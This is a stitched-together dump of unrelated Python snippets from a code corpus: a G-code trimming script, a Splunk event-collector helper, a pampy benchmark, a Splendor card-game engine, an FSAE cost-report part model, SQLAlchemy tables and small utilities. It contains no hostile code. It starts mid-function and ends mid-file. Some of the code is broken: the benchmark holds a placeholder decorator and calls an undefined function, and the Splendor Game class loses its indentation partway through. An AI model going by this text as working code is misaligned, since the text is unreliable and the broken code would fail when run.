            # NOTE(review): the comparison is an exact match, so a line like
            # '; Layer:12' will never equal start_key — ``delete`` simply
            # starts True and flips at stop_key; confirm this is intended.
            try:
                # read the file lines
                with open('{}/files/Layer/skin/{}'.format(path1, string_in_string), 'r+') as fr:
                    lines = fr.readlines()
                # write the file lines except the start_key until the stop_key
                with open('{}/files/Layer/skin/{}'.format(path1, string_in_string), 'w+') as fw:
                    # delete variable to control deletion
                    delete = True
                    # iterate over the file lines
                    for line in lines:
                        # check if the line is a start_key
                        # set delete to True (start deleting)
                        if line.strip('\n') == start_key:
                            delete = True
                        # check if the line is a stop_key
                        # set delete to False (stop deleting)
                        elif line.strip('\n') == stop_key:
                            delete = False
                        # write the line back based on delete value
                        # if the delete setten to True this will
                        # not be executed (the line will be skipped)
                        if not delete:
                            fw.write(line)
            except RuntimeError as ex:
                # NOTE(review): file errors raise OSError, not RuntimeError —
                # confirm which failure this was meant to catch.
                print(f"erase error:\n\t{ex}")
        def erase2(): # erases the bottom of the file (after the skin section)
            """
            This function will delete all line from the givin start_key
            until the stop_key. (include: start_key) (exclude: stop_key)
            """
            start_key2 = ';MESH:NONMESH'
            stop_key2 = ";TIME_ELAPSED:"
            # NOTE(review): real lines look like ';TIME_ELAPSED:123.4', which
            # never equals stop_key2 exactly, so deletion may run to EOF —
            # TODO confirm against actual slicer output.
            try:
                # read the file lines
                with open('{}/files/Layer/skin/{}'.format(path1,string_in_string), 'r+') as fr:
                    lines = fr.readlines()
                # write the file lines except the start_key until the stop_key
                with open('{}/files/Layer/skin/{}'.format(path1, string_in_string), 'w+') as fw:
                    # delete variable to control deletion
                    delete = False
                    # iterate over the file lines
                    for line in lines:
                        # check if the line is a start_key
                        # set delete to True (start deleting)
                        if line.strip('\n') == start_key2:
                            delete = True
                        # check if the line is a stop_key
                        # set delete to False (stop deleting)
                        elif line.strip('\n') == stop_key2:
                            delete = False
                        # write the line back based on delete value
                        # if the delete setten to True this will
                        # not be executed (the line will be skipped)
                        if not delete:
                            fw.write(line)
            except RuntimeError as ex:
                print(f"erase error:\n\t{ex}")
        erase()
        erase2()
if __name__ == '__main__':
    # Copy the layer files first, then strip them down to their skin sections.
    copi()
    skin()
| StarcoderdataPython |
from splunk_http_event_collector import http_event_collector
def getHecConn(token, host, event_type, event_host, port, secure):
    """Build an HTTP Event Collector client; return None if unreachable."""
    connector = http_event_collector(token,
                                     host,
                                     event_type,
                                     event_host,
                                     port,
                                     secure)
    # Only hand back a connector whose endpoint answered the reachability probe.
    if connector.check_connectivity():
        return connector
    return None
# Create a payload to send to splunk.
# Assign all common parameters here; event-specific data is added later.
def initSplunkPayload(
        index="main",
        host="localhost",
        source="raspberry",
        sourcetype="_json"):
    """Return the common metadata fields shared by every Splunk HEC event."""
    return {
        "index": index,
        "sourcetype": sourcetype,
        "source": source,
        "host": host,
    }
| StarcoderdataPython |
8015776 | <filename>benchmark.py
from pampy import match, _
from pattern_matching import *
def test_pampy(data):
    # Benchmark body: dispatch every datum through pampy's ``match``.
    # Patterns: [any, str, any] -> "a(b)c", (str, int) -> repeated string,
    # (int, int) -> digit concatenation.
    for datum in data:
        match(datum,
              [_, str, _], lambda a, b, c: "%s(%s)%s"%(a, b, c),
              (str, int), lambda a, b: a * b,
              (int, int), lambda a, b: "%d%d"%(a, b))
class MatchError(Exception):
    """Raised when a value does not satisfy a TypeMatcher pattern."""
    pass


class TypeMatcher:
    """Pattern object matching exactly one value of a fixed type ``t``.

    ``__match__(x, i)`` succeeds only for arity 1 (``i == 1``) when ``x`` is
    an instance of ``t``; it returns the captured value as a 1-tuple.
    """

    def __init__(self, t):
        def match(x, i):
            # Fix: the original used ``i is not 1`` — an identity check on an
            # int literal that only works via CPython's small-int cache and
            # emits a SyntaxWarning on Python 3.8+; equality is correct.
            if i != 1 or not isinstance(x, t):
                raise MatchError
            return (x, )
        self.__match__ = match


Str = TypeMatcher(str)
Int = TypeMatcher(int)
@syntax_rule(pattern_matching)
async def __never(): pass  # placeholder removed — see below
# Inputs exercising all three patterns in both implementations.
data = [("xx", 3), ("yyy", 2), (1, 2), (5, 6), (1000, 2000)]
test_pampy(data)
test_mm(data)
# %timeit test_mm(data)
# 9.83 µs ± 85.9 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each)
# %timeit test_pampy(data)
# 52.8 µs ± 797 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each)
import re
import ast
from contextlib import suppress
from random import randint
from typing import Union, List, Tuple, Optional
class GameError(Exception):
    """Domain error raised for illegal game actions or invalid selections."""
class Card:
    # A Splendor-style development/aristocrat card: a gem color, a point
    # value, a tier level (0 = aristocrat), and a 5-color token cost.
    COLOR_CODES = ['r', 'd', 'o', 'e', 's', 'x']
    COLOR_SHORT_NAMES = ["ruby ", "diamd", "onyx ", "emrld", "saphi", "artcr"]
    # code -> [short name, numeric color id]
    COLOR_IDS = {
        key: [value, cid] for key, value, cid in zip(COLOR_CODES, COLOR_SHORT_NAMES, range(len(COLOR_CODES)))
    }
    def __init__(self, format_list: list = None, gem: str = None, level: int = None,
                 value: int = None, cost: list = None, printing_rules='e'):
        # Either a 9-element format list [gem, ?, value, level, cost*5] or the
        # individual keyword fields must be supplied.
        if format_list and len(format_list) == 9:
            if not isinstance(format_list[0], str):
                raise ValueError("improper color code type in first format argument")
            if len(format_list[0]) != 1:
                raise ValueError("code has exactly one character")
            if any([(not isinstance(i, int)) for i in format_list[1:]]):
                raise ValueError("improper type of format list argument; should be int")
            self.gem = format_list[0]
            self.value = format_list[2]
            self.level = format_list[3]
            self.cost = tuple(format_list[4:])
        else:
            if any([gem is None, level is None, value is None, cost is None]):
                if len(format_list) != 9:
                    raise ValueError("format list has to be exactly 9 elements long")
                raise ValueError("Values can't be empty unless you provide formating list with 9 elements")
            if gem not in self.COLOR_CODES:
                raise ValueError(f"{gem} isn't valid color code")
            if any([not isinstance(level, int), not isinstance(value, int)]):
                raise ValueError("card value and level has to be of type int")
            if len(cost) != 5:
                raise ValueError("cost variable has to have exactly 5 values")
            if any([(not isinstance(val, int)) for val in cost]):
                raise ValueError("values in cost has to be of type int")
            self.gem = gem
            self.value = value
            self.level = level
            self.cost = tuple(cost)
        self.printing_rules = printing_rules
    def __str__(self):
        # simplifying case: falsy printing_rules -> compact list form
        if not self.printing_rules:
            return str([self.gem, self.level, self.value, self.cost])
        p = f' {self.value if self.value > 0 else " "} '
        rank = ' R' + ''.join(['I' if i <= self.level - 1 else ' ' for i in range(3)]) + ' '
        gem = self.COLOR_SHORT_NAMES[self.color_id]
        # ASCII-art card face with per-color costs down the right side.
        return ''.join([
            f"╔═════════════════╗\n",
            f"║ {gem} {p} ║\n",
            f"║ + {rank} ║\n",
            f"║ /_\ ║\n",
            f"║ :<_>: %s rub ║\n" % (f' {self.cost[0]}',),
            f"║ /=====\ %s dia ║\n" % (f' {self.cost[1]}',),
            f"║ :_[I]_: %s onx ║\n" % (f' {self.cost[2]}',),
            f"║::::::::: %s emd ║\n" % (f' {self.cost[3]}',),
            f"║ %s sap ║\n" % (f' {self.cost[4]}',),
            f"╚═════════════════╝"])
    def __eq__(self, other):
        # Equality by full (gem, level, value, cost); identity short-circuits.
        if isinstance(other, self.__class__):
            if other is not self:
                return [self.gem, self.level, self.value, self.cost] == \
                       [other.gem, other.level, other.value, other.cost]
            else:
                return True
        elif isinstance(other, Player):
            raise NotImplementedError(f"comparison between {other.__class__} and {self.__class__} not implemented")
        elif other is None:
            return False
        raise TypeError(f"comparing {self.__class__} to {other.__class__} has no meaning in this context")
    @property
    def color_id(self):
        # Numeric id (0-5) of this card's gem color.
        return self.COLOR_IDS[self.gem][1]
    def can_be_bought(self, other):
        """
        for simplicity, invoking counterpart method from 'Player' class
        """
        if isinstance(other, Player):
            return other.can_buy(self)
        raise ValueError(f"can't compare object {other.__class__} to Card meaningfully")
    def print_short(self):
        # Render the compact form without permanently clearing printing_rules.
        p_r = self.printing_rules
        self.printing_rules = None
        s = str(self)
        self.printing_rules = p_r
        return s
class Player:
    # A player: token counts by color id (index 5 = wildcard), owned cards,
    # and up to three reserved cards.
    def __init__(self, p_id: int):
        if not isinstance(p_id, int):
            raise ValueError(f'id of the player should be of class int, not {p_id.__class__}')
        self.id = p_id
        self.tokens = [0] * 6
        self.cards = []
        self.reserved = (None, None, None,)
    @staticmethod
    def provide_position() -> Tuple[int, int]:
        # Interactive prompt loop; repeats until both inputs parse as ints.
        chosen = False
        while not chosen:
            try:
                row = input("choose row of cards")
                card = input("choose card in given row")
                r = int(row)
                c = int(card)
                chosen = True
                return r, c
            except ValueError:
                print("couldn't convert inputs into integer numbers, "
                      "try again and make sure you typed correct data")
    @property
    def buying_power(self):
        # Tokens plus one permanent discount per owned card of each color.
        # this avoids deepcopy
        power = [_ for _ in self.tokens]
        for card in self.cards:
            power[card.color_id] += 1
        return power
    @property
    def card_power(self):
        # Permanent discounts only (owned cards), wildcards (id 5) excluded.
        power = [0] * 5
        for card in self.cards:
            if card.color_id != 5:
                power[card.color_id] += 1
        return power
    def check_selection(self, open_cards: List[List[Card]], deck_sizes: List[int], desired_card: tuple):
        # Validate a (row, column) pick: columns 0-3 are face-up cards,
        # 4 is the top of the row's deck, 5 is one of the player's reserves.
        if not (desired_card[0] in [0, 1, 2]) or not(desired_card[1] in [0, 1, 2, 3, 4, 5]):
            raise GameError("selection doesn't match any of the available positions")
        if desired_card[1] < 4:
            if open_cards[desired_card[0]][desired_card[1]] is None:
                raise GameError("there is no card at given position")
        if desired_card[1] == 4:
            # check tops of the given row's deck
            if desired_card[0] == 0:
                if deck_sizes[0] == 0:
                    raise GameError("no card in the L1 deck")
            if desired_card[0] == 1:
                if deck_sizes[1] == 0:
                    raise GameError("no card in the L2 deck")
            if desired_card[0] == 2:
                if deck_sizes[2] == 0:
                    raise GameError("no card in the L3 deck")
        if desired_card[1] == 5:
            # check 'slot' in self.reserved
            try:
                if self.reserved[desired_card[0]] is None:
                    raise GameError("no card to choose in this position")
            except IndexError:
                raise GameError("you haven't yet reserved a card")
    def can_buy(self, other: Card) -> Tuple[bool, int]:
        """
        this is used to calculate if a player can afford to buy a specific card most of the time
        first we calculate if player has enough combined regular tokens + card equivalents
        then if he has not enough, 'wild-card' tokens come to calculation, and only if this is not enough
        it returns false
        :param other: Card that one wish to buy
        :return: True if greater or equal, or not if there's not enough resources, and the nr of wildcards
        """
        # guard statements
        if not isinstance(other, Card):
            if isinstance(other, Player):
                raise NotImplementedError("comparison between players isn't implemented yet")
            raise ValueError(f"can't compare object {other.__class__} to Player meaningfully")
        if other.level == 0:
            raise GameError("can't buy aristocrat card! Aristocrats can only be invited")
        # compute the difference of the player 'buy-power' against card cost,
        # leave values only for tokens that matter
        cids = Card.COLOR_IDS
        difference = [
            self.buying_power[cids[c_code][1]] - other.cost[cids[c_code][1]]
            for c_code in Card.COLOR_CODES[:5]
        ]
        # total shortfall across colors must be covered by wildcards (index 5)
        lacking = -sum([0 if d >= 0 else d for d in difference])
        if lacking > self.tokens[5]:
            return False, lacking
        return True, lacking
    def get_token(self, color: int):
        # Receive one token of the given color (bank bookkeeping is in Game).
        self.tokens[color] += 1
    def pay_tokens(self, debt: Tuple[bool, int], card: Card) -> List[int]:
        # Deduct the token cost of ``card`` (after card discounts), plus the
        # wildcard shortfall carried in ``debt[1]``; returns the paid amounts.
        if card.level == 0:
            raise GameError("aristocrat Card should not appear here")
        to_pay = [
            min(tokens, max(cost - cs, 0)) if cost > 0 else 0
            for tokens, cs, cost in zip(self.tokens, self.card_power, card.cost)
        ] + [debt[1]]
        self.tokens = [tokens - pay_amount for tokens, pay_amount in zip(self.tokens, to_pay)]
        return to_pay
    def pay_token(self, color: int):
        # Give back a single token; guarded against going negative.
        if self.tokens[color] == 0:
            raise GameError("can't pay more, we have 0 tokens")
        self.tokens[color] -= 1
    def buy_card(self, card: Card):
        # Buy a face-up card if affordable; returns (bought?, tokens paid).
        if (cmp := self.can_buy(card))[0]:
            self.cards.append(card)
            paid = self.pay_tokens(cmp, card)
            return True, paid
        return False, [0] * 6
    def buy_reserve(self, desired_card: int):
        # Buy one of the reserved cards by slot index; frees the slot on success.
        try:
            if (cmp := self.can_buy(card := self.reserved[desired_card]))[0]:
                self.cards.append(self.reserved[desired_card])
                r = [c for index, c in enumerate(self.reserved) if index != desired_card] + [None]
                self.reserved = tuple(r)
                paid = self.pay_tokens(cmp, card)
                return True, paid
        except ValueError as ve:
            # can_buy(None) raises ValueError; translate an empty slot into a
            # game-level error, re-raise anything else.
            if self.reserved[desired_card] is None:
                raise GameError("No card in this reserve slot! Choose another card")
            else:
                raise ValueError(str(ve))
        return False, [0] * 6
    def reserve(self, card: Card):
        # Put a card into the reserve (newest first), max three at a time.
        if card.level == 0:
            raise GameError("aristocrats can't be reserved")
        if None in self.reserved:
            r = [card] + list(self.reserved[:2])
            self.reserved = tuple(r)
        else:
            raise GameError("Can't reserve more than 3 cards, buy the reserved card out to free space")
    def select_card(self, open_cards: List[List[Card]], deck_sizes: List[int]) -> Tuple[int, int]:
        # Ask the user for a position and validate it against the table state.
        desired_card = self.provide_position()
        # function call serving as guard statement
        self.check_selection(open_cards, deck_sizes, desired_card)
        return desired_card
    def can_invite(self, card: Card):
        # An aristocrat (level 0) can be invited when the player's card
        # discounts cover every color requirement.
        if isinstance(card, Card):
            if card.level == 0:
                diff = [cp - cost for cp, cost in zip(self.card_power, card.cost)]
                fulfilled_requirements = [True if d >= 0 else False for d in diff]
                if all(fulfilled_requirements):
                    return True
                return False
            raise GameError("this is not aristocrat card!")
        elif card is None:
            return False
        raise TypeError("unsupported for types other than Card")
    def invite(self, card: Card):
        # Claim an aristocrat if eligible; returns the card, or None implicitly.
        if self.can_invite(card):
            print("can invite")
            print("inviting:\n", card)
            self.cards.append(card)
            return card
class Game:
    def __init__(self, player_count: int):
        # Splendor supports 2-4 players only.
        if not (1 < player_count < 5):
            raise GameError("cant start game with improper number of players")
        self.player_count = player_count
        # Face-down decks per card tier plus the noble (aristocrat) deck.
        self.l1_deck: List[Card] = []
        self.l2_deck: List[Card] = []
        self.l3_deck: List[Card] = []
        self.nobles: List[Card] = []
        self.players: List[Player] = []
        # Token bank by color id (index 5 = wildcard).
        self.tokens: List[int] = []
        # Face-up rows: three card rows of four, plus the noble row.
        self.open_cards: List[List[Optional[Card]]] = []
@staticmethod
def load_cards(file: str = "cards.txt"):
all_cards = []
with open(file, "r") as card_db:
for line in card_db:
if not re.match(r"#", line):
card_entry = ast.literal_eval(line)
all_cards.append(card_entry)
return all_cards
@staticmethod
def dek_tiers(_cards):
return [_cards[:40], _cards[40:70], _cards[70:90], _cards[90:]]
@staticmethod
def shuffle_dek(_dek):
_d = _dek
for i in range(len(_d) * 7):
j = randint(0, len(_d) - 1)
k = randint(0, len(_d) - 1)
if k != j:
_d[j], _d[k] = _d[k], _d[j]
return _d
@staticmethod
def shuffle(_decks):
return [Game.shuffle_dek(_d) for _d in _decks]
@property
def deck_sizes(self):
return [len(self.l1_deck), len(self.l2_deck), len(self.l3_deck)]
def setup_tokens(self):
if self.player_count > 2:
if self.player_count == 4:
self.tokens = [7] * 5 + [5]
return
self.tokens = [5] * 5 + [5]
return
self.tokens = [4] * 5 + [5]
def setup_cards(self):
kards = Game.dek_tiers(Game.load_cards())
self.l1_deck = [Card(c) for c in kards[0]]
self.l2_deck = [Card(c) for c in kards[1]]
self.l3_deck = [Card(c) for c in kards[2]]
self.nobles = [Card(c) for c in kards[3]]
self.open_cards = [
[self.l1_deck.pop() for _ in range(4)],
[self.l2_deck.pop() for _ in range(4)],
[self.l3_deck.pop() for _ in range(4)],
[self.nobles.pop() for _ in range(self.player_count + 1)],
]
def setup_players(self):
self.players = [Player(p_id=i) for i in range(self.player_count)]
def full_setup(self):
self.setup_tokens()
self.setup_cards()
self.setup_players()
def give_token(self, color: int, p_id: int):
if not 0 <= color <= 5:
raise GameError('color does not exist')
if self.tokens[color] > 0:
self.tokens[color] -= 1
self.players[p_id].get_token(color)
return
raise GameError("can't give tokens of a color when there's none")
def take_token(self, color: int, p_id: int):
if not 0 <= color <= 5:
raise GameError('color does not exist')
if self.players[p_id].tokens[color] > 0:
self.tokens[color] += 1
self.players[p_id].pay_token(color)
return
raise GameError("can't take tokens when player has none")
def replace_empty(self):
for deck, row in enumerate(self.open_cards):
for index, slot in enumerate(row):
if not slot:
with suppress(IndexError):
# it is ok for multiple/one of the decks to run out,
# in 4-player game l1 runs out quite often
if deck == 0:
self.open_cards[deck][index] = self.l1_deck.pop()
elif deck == 1:
self.open_cards[deck][index] = self.l2_deck.pop()
elif deck == 2:
self.open_cards[deck][index] = self.l3_deck.pop()
def player_draw_3(self, colors: Union[list, tuple], p_id: int):
if 0 < len(colors) < 4:
for color in colors:
self.give_token(color, p_id=p_id)
return
raise GameError("too many or too little colors chosen")
def player_draw_2_same(self, color: int, p_id: int):
if self.tokens[color] > 2:
self.give_token(color, p_id)
self.give_token(color, p_id)
return
raise GameError("given color isn't available to be chosen in that option")
def player_select(self, p_id: int):
self.players[p_id]: Player
desired_card = self.players[p_id].select_card(self.open_cards, self.deck_sizes)
# the necessary check were already performed in 'Player' by this point
if desired_card[1] == 4:
# reserve-only - selecting top of the corresponding deck
# since i am using pop to push new cards onto open field, the last element of the
# card list in a deck is considered it's top
if desired_card[0] == 0:
card = self.l1_deck[-1]
if desired_card[0] == 1:
card = self.l2_deck[-1]
if desired_card[0] == 2:
card = self.l3_deck[-1]
elif desired_card[1] == 5:
# buying from reserved cards only
card = self.players[p_id].reserved[desired_card[0]]
else:
card = self.open_cards[desired_card[0]][desired_card[1]]
return card, desired_card
def player_buys(self, card: Card, desired_card: tuple, p_id: int):
# traditional buy
if desired_card[1] in [0, 1, 2, 3]:
bought, paid = self.players[p_id].buy_card(card)
if bought:
self.open_cards[desired_card[0]][desired_card[1]] = None
elif desired_card[1] == 4:
raise GameError("can't buy card from the top of the library directly!")
# buy from reserve
elif desired_card[1] == 5:
bought, paid = self.players[p_id].buy_reserve(desired_card[0])
try:
for color, tokens in enumerate(paid):
self.tokens[color] += tokens
except UnboundLocalError:
raise GameError("something went wrong with buying card")
def player_reserve(self, card: Card, desired_card: tuple, p_id: int):
if desired_card[1] == 4:
self.players[p_id].reserve(card)
if desired_card[0] == 0:
c = self.l1_deck.pop()
if desired_card[0] == 1:
c = self.l2_deck.pop()
if desired_card[0] == 2:
c = self.l3_deck.pop()
else:
self.players[p_id].reserve(card)
self.open_cards[desired_card[0]][desired_card[1]] = None
c = card
self.give_token(Card.COLOR_IDS['x'][1], p_id)
return c
def player_aristocrat_inviting(self, p_id):
a_id = -1
for index, aristocrat in enumerate(self.open_cards[3]):
card = self.players[p_id].invite(aristocrat)
if card:
a_id = index
break
if a_id != -1:
self.open_cards[3][a_id] = None
return card
if __name__ == '__main__':
    # Ad-hoc smoke test: exercises card loading, deck tiering/shuffling,
    # Card construction and Player cost/power properties without running
    # a full game.
    cards = Game.load_cards()
    # pprint(cards)
    # print(cards[3], len(cards))
    for dek_t in (decks := Game.dek_tiers(cards)):
        # pprint(dek_t)
        print(len(dek_t))
    decks = Game.shuffle(decks)
    # pprint(decks)
    print(cards[0])
    new_card = Card(format_list=cards[0])
    print(new_card)
    new_card.print_short()
    print(cards[57])
    new_card2 = Card(format_list=cards[57])
    print(new_card2)
    new_card2.print_short()
    player1 = Player(0)
    player1.tokens[1] = 2
    player1.tokens[0] = 1
    player1.tokens[3] = 3
    player1.cards = [new_card, new_card2]
    # Repeated property reads -- presumably checking that card_power /
    # buying_power are recomputed or cached consistently; confirm against
    # Player's property implementations.
    print(player1.card_power)
    print(player1.card_power)
    print(player1.buying_power)
    print(player1.buying_power)
    print(player1.buying_power)
    print(player1.card_power)
    print(player1.cards)
| StarcoderdataPython |
3512809 | #!/usr/bin/env python
"""
Main objects of the systems: Part and Assembly
"""
# Standard library modules.
import operator
import functools
# Third party modules.
# Local modules.
from fsaecostreport.pattern import SYS_ASSY_PN, SUB_ASSY_PN, PART_PN
# Globals and constants variables.
@functools.total_ordering
class _Component(object):
    """
    Abstract class for parts and assemblies.
    """
    def __init__(self, filepath, system_label, name, pn_base, revision, details=""):
        """
        Creates a component.
        :arg system_label: label of the system in which the component is in
        :arg name: full name
        :arg pn_base: part number base (e.g. 00001 in BR-00001-AA)
        :arg revision: two characters revision
        :arg details: further details/description
        **Attributes**:
        * :attr:`name`: full name
        * :attr:`pn_base`: part number base (e.g. 00001 in BR-00001-AA)
        * :attr:`revision`: two characters revision
        * :attr:`details`: further details/description
        * :attr:`partnumber` or :attr:`pn`: part number (e.g. BR-00001-AA)
        * :attr:`materials`: list of materials
        * :attr:`processes`: list of processes
        * :attr:`fasteners`: list of fasteners
        * :attr:`toolings`: list of toolings
        * :attr:`drawings`: list of drawings (paths of files)
        * :attr:`pictures`: list of pictures (paths of files)
        * :attr:`parents`: parent assemblies of this component
        * :attr:`components`: parts or assemblies of this component
        * :attr:`quantity`: quantity of this component in the whole system
        * :attr:`unitcost`: cost for one of this component
        **Notes**:
        * Two components are equal if their part number is equal.
        """
        # arguments
        self.filepath = filepath
        self._system_label = system_label.upper()
        self.name = name
        self.pn_base = pn_base.upper()
        self.revision = revision.upper()
        self.details = details
        # extras
        self._quantity = 0
        self.parents = set()
        self.components = {}
        self.materials = []
        self.processes = []
        self.fasteners = []
        self.toolings = []
        self.drawings = []
        self.pictures = []
        # check
        if not self._validate_pn():
            raise ValueError("Incorrect P/N (%s)" % self.pn)
    def __str__(self):
        return self.name
    def __repr__(self):
        return "<%s '%s'>" % (self.__class__.__name__, self.pn)
    def __eq__(self, other):
        # Components are identified solely by their part number.
        return self.pn == other.pn
    def __lt__(self, other):
        """
        Orders components: system label first, then assemblies ("A") after
        parts, then the designation and category digits ("0" sorts as
        smallest), then the counter, then the revision.
        functools.total_ordering derives the remaining comparisons.
        """
        # system label
        if self._system_label != other._system_label:
            return self._system_label > other._system_label
        # assembly or part number
        if self.pn_base[0] != other.pn_base[0]:
            if self.pn_base[0] == "A":
                return False
            else:
                return True
        # designation
        if self.pn_base[1] != other.pn_base[1]:
            if self.pn_base[1] == "0":
                return True
            elif other.pn_base[1] == "0":  # bug fix: previously read other.pn_base[2]
                return False
            else:
                return self.pn_base[1] > other.pn_base[1]
        # category
        if self.pn_base[2] != other.pn_base[2]:
            if self.pn_base[2] == "0":
                return True
            elif other.pn_base[2] == "0":
                return False
            else:
                return self.pn_base[2] > other.pn_base[2]
        # counter
        if int(self.pn_base[3:5]) != int(other.pn_base[3:5]):
            return int(self.pn_base[3:5]) > int(other.pn_base[3:5])
        # revision
        return self.revision < other.revision
    def __hash__(self):
        return hash(self.partnumber)
    def _validate_pn(self):
        # The P/N must match one of the three recognised formats.
        return (
            SYS_ASSY_PN.match(self.pn)
            or SUB_ASSY_PN.match(self.pn)
            or PART_PN.match(self.pn)
        )
    @property
    def partnumber(self):
        """Full part number, e.g. BR-00001-AA."""
        return "%s-%s-%s" % (self._system_label, self.pn_base, self.revision)
    pn = partnumber
    @property
    def quantity(self):
        """
        Returns the overall quantity of this component in a system.
        """
        if not self.parents:
            return self._quantity
        else:
            qty = 0
            for parent in self.parents:
                qty += parent.quantity * parent.components[self]
            return qty
    @property
    def unitcost(self):
        """
        Returns the unit cost of the component by adding the subtotal of the
        materials, processes, fasteners and toolings as well as the parts
        for assembly components.
        """
        cost = self.tablecost
        for component, quantity in self.components.items():
            cost += component.unitcost * quantity
        return cost
    @property
    def tablecost(self):
        """
        Returns the cost of the materials, processes, fasteners and toolings.
        For assemblies, the cost of other parts is NOT included.
        """
        subtotal_getter = operator.attrgetter("subtotal")
        cost = 0.0
        cost += sum(map(subtotal_getter, self.materials))
        cost += sum(map(subtotal_getter, self.processes))
        cost += sum(map(subtotal_getter, self.fasteners))
        cost += sum(map(subtotal_getter, self.toolings))
        return cost
    def get_hierarchy(self):
        """
        Returns an ordered list of this component and its sub-components.
        """
        hierarchy = [self]
        for component in reversed(sorted(self.components.keys())):
            hierarchy.extend(component.get_hierarchy())
        return hierarchy
class Part(_Component):
    """
    A part.

    Leaf component: no sub-components, so its unit cost is just its own
    table cost (materials, processes, fasteners, toolings).
    """
    pass
class Assembly(_Component):
    """
    An assembly.

    Composite component: its unit cost also includes the costs of its
    child components (see _Component.unitcost).
    """
    pass
| StarcoderdataPython |
1988353 | import os
import json
from collections import OrderedDict
from flask_appbuilder import Model
from sqlalchemy import Table, Column, Integer, String, ForeignKey, Date, Float, Text
import sqlalchemy as sa
class IRT(Model):
    """Data-dictionary table for the iRT dataset (field name -> description)."""
    __tablename__ = "iRT"
    # Surrogate primary key.
    id = Column(Integer, primary_key=True)
    field_name = Column(Text, unique=False, nullable=False)
    describe = Column(Text, unique=False, nullable=False)
class GreenT(Model):
    """Data-dictionary table for the GreenT dataset (field name -> description)."""
    __tablename__ = 'GreenT'
    id = Column(Integer, primary_key=True)
    field_name = Column(Text, unique=False, nullable=False)
    describe = Column(Text, unique=False, nullable=False)
class DSED(Model):
    """Data-dictionary table for the DSED dataset (field name -> description)."""
    __tablename__ = 'DSED'
    id = Column(Integer, primary_key=True)
    field_name = Column(Text, unique=False, nullable=False)
    describe = Column(Text, unique=False, nullable=False)
class DSE(Model):
    """Data-dictionary table for the DSE dataset (field name -> description)."""
    __tablename__ = 'DSE'
    id = Column(Integer, primary_key=True)
    field_name = Column(Text, unique=False, nullable=False)
    describe = Column(Text, unique=False, nullable=False)
class Company(Model):
    """Company lookup table.

    NOTE(review): unlike its sibling tables this one has no `describe`
    column -- confirm whether that is intentional or truncated.
    """
    __tablename__ = 'company'
    id = Column(Integer, primary_key=True)
    field_name = Column(Text, unique=False, nullable=False)
| StarcoderdataPython |
11369924 | <reponame>mpkato/openliveq<gh_stars>1-10
class QueryQuestion(object):
    """A (query_id, question_id) pair parsed from tab-separated input."""

    def __init__(self, query_id, question_id):
        self.query_id = query_id
        self.question_id = question_id

    @classmethod
    def readline(cls, line):
        """Parse one tab-separated line into a QueryQuestion.

        Raises RuntimeError when the line does not contain exactly
        two fields.
        """
        fields = [field.strip() for field in line.split("\t")]
        if len(fields) == 2:
            return QueryQuestion(*fields)
        raise RuntimeError("Invalid format for %s: %s"
            % (cls.__name__, line))

    @classmethod
    def load(cls, fp):
        """Parse every line of *fp* into a list of QueryQuestion objects."""
        return [QueryQuestion.readline(line) for line in fp]
| StarcoderdataPython |
6581677 | from NN.main.train import train
from NN.main.predict import predict | StarcoderdataPython |
6496251 | <filename>tests/test_auth.py
"""Unit tests for the authorization module."""
import unittest
if __name__ == '__main__':
    # NOTE(review): placeholder entry point -- unittest.main() was likely
    # intended so the module's (future) tests run when executed directly.
    pass
| StarcoderdataPython |
1819446 | """Infrastructure for detecting abstraction barrier violations."""
class AbstractionViolation(Exception):
    """Raised when client code pierces a data-abstraction barrier."""
    pass
def datatype(obj):
    """Return the class name of *obj*, for use in violation messages."""
    return obj.__class__.__name__
# Generic abstract data type
class Abstract(object):
    """Base class whose instances reject every built-in operation.

    Every dunder raises AbstractionViolation so code that bypasses an
    ADT's constructor/selector functions fails loudly.  Identity-based
    ==/!= against instances of the same type, and __hash__ (object id),
    are the only operations that work.
    """
    def __add__(self, other):
        raise AbstractionViolation("Can't add {} object to {}".format(datatype(self), datatype(other)))
    def __radd__(self, other):
        raise AbstractionViolation("Can't add {} object to {}".format(datatype(self), datatype(other)))
    def __eq__(self, other):
        if isinstance(other, type(self)):
            return other is self
        raise AbstractionViolation("Can't use == on {} object and {}".format(datatype(self), datatype(other)))
    def __ne__(self, other):
        if isinstance(other, type(self)):
            return other is not self
        raise AbstractionViolation("Can't use != on {} object and {}".format(datatype(self), datatype(other)))
    def __bool__(self):
        raise AbstractionViolation("Can't use {} object as a boolean".format(datatype(self)))
    def __getitem__(self, index):
        raise AbstractionViolation("Can't use [] notation on {} object".format(datatype(self)))
    def __contains__(self, other):
        raise AbstractionViolation("Can't use contains notation on {} object".format(datatype(self)))
    def __delitem__(self, other):
        raise AbstractionViolation("Can't use del notation on {} object".format(datatype(self)))
    def __iter__(self):
        raise AbstractionViolation("Can't iterate on {} object".format(datatype(self)))
    def __len__(self):
        raise AbstractionViolation("Can't use len notation on {} object".format(datatype(self)))
    def __setitem__(self, key, item):
        raise AbstractionViolation("Can't use setitem notation on {} object".format(datatype(self)))
    def __call__(self, *args, **kwargs):
        raise AbstractionViolation("Can't call {} object".format(datatype(self)))
    def __hash__(self):
        # Hashing must keep working so instances can live in sets/dicts.
        return id(self)
class WordTime(Abstract):
    """Concrete word-time ADT: a typed word paired with its elapsed time.

    Fields are deliberately named a/b so clients must use the word() /
    elapsed_time() selectors instead of touching attributes directly.
    """
    def __init__(self, word, time):
        self.a, self.b = word, time
    def __repr__(self):
        return '<WordTime {} {}>'.format(self.a, self.b)
# Constructor and selectors forming this module's word-time ADT interface.
word_time = WordTime
word = lambda u: u.a
elapsed_time = lambda u: u.b
# Saved original implementations, filled by swap_implementations().
old = {}
def swap_implementations(impl):
    """Swap *impl*'s word-time implementation for the checked one here.

    Saves impl's original (word_time, word, elapsed_time) triple in the
    module-level ``old`` dict so restore_implementations() can undo it.
    """
    # save the module's original implementations
    old['word_time'] = impl.word_time, impl.word, impl.elapsed_time
    # replace impl's implementations with ours
    # (a dead local that packed our implementations into an unused tuple
    # was removed here)
    impl.word_time, impl.word, impl.elapsed_time = word_time, word, elapsed_time
def restore_implementations(impl):
    """Undo swap_implementations() by restoring *impl*'s saved functions."""
    impl.word_time, impl.word, impl.elapsed_time = old['word_time']
| StarcoderdataPython |
8048287 | <filename>plugins/seo_amp.py<gh_stars>1-10
"""manifest plugin"""
from typing import TYPE_CHECKING, List
from bs4 import BeautifulSoup
from markata import Markata, __version__
